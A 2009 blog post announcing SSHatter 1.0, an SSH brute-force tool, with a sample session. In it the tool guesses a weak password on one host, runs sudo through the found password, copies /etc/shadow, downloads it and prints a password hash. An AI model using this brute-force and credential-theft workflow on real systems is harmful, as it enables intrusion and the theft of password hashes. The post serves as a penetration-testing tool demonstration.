2009-12-10 02:02:25
By Tim Brown
Well, it's taken a while (lots of other interesting stuff to keep me busy) but I'm pleased to announce that SSHatter 1.0 is almost ready for release. I tagged a private 0.9 release last night and assuming no major bugs are identified I'd expect that 1.0 will be released over the weekend. So what can you look forward to in SSHatter 1.0? Well, I've taken a long hard look at what other tools exist (notably keimpx by one of my colleagues which aims to take the pain out of large Windows networks). The upshot is that SSHatter 1.0 as been rebuilt for exploitation. Take a look at the session below which should give you some idea of what to expect:
$ ./SSHatter.pl -x 5 -t testdata/t -u testdata/u -p testdata/p I: 10.31.33.7:22 I: 10.31.33.7:22 finished y:y@10.31.33.7:22
As you can see, I enumerated just one host (10.31.33.7) and found one user "y" with a password of "y". Now that's where the old SSHatter would stop, but hold on a minute, SSHatter 1.0 has a bunch of features for post brute force exploration:
$ ./SSHatter.pl -x 5 -t testdata/t -u testdata/u -p testdata/p -0 -s -i
I: 10.31.33.7:22
I: 10.31.33.7:22 finished
y:y@10.31.33.7:22
W: executing in interactive mode, continue? [y/N] y
$ id
[y:y@10.31.33.7:22]$ id
uid=1002(y) gid=1003(y) groups=1003(y)
$ sudo -S -l
[y:y@10.31.33.7:22]$ sudo -S -l
Matching Defaults entries for y on this host:
env_reset
User y may run the following commands on this host:
(ALL) ALL
$ sudo -S cp /etc/shadow shadow
[y:y@10.31.33.7:22]$ sudo -S cp /etc/shadow shadow
$ sudo -S chown y shadow
[y:y@10.31.33.7:22]$ sudo -S chown y shadow
$ get shadow
[y:y@10.31.33.7:22]$ cat shadow
$ exitAs you can see, I reran SSHatter with the -i flag which tells it that I want to use it in interactive mode. I was able to confirm my id and then make a call to sudo. Later versions of this popular access control tool have the -S flag which tells it to take a password from the STDIO and not from the psuedo terminal. This combined with the -0 flag allows us to pass our newly discovered password through and executed commands as root. As you can see, I use this feature to take a copy of /etc/shadow and once changing it's ownership I issue the get command to download it:
$ cat y@10.31.33.7:22-shadow | grep y y:$8$ko3ACbLg$sI2Nq02nmGDPxSqJ9UA3zxTDOp5oNTSCKmAlDtbawyfc8NbR8qXmmVGHeHn2183UWrY0Ie8wlO/yf2dhiXHPP/:14554:0:99999:7:::
Sure enough, I now have a copy of the shadow file on my local system.
Mood: Pleased
Music: No Use For A Name
You are unknown, comment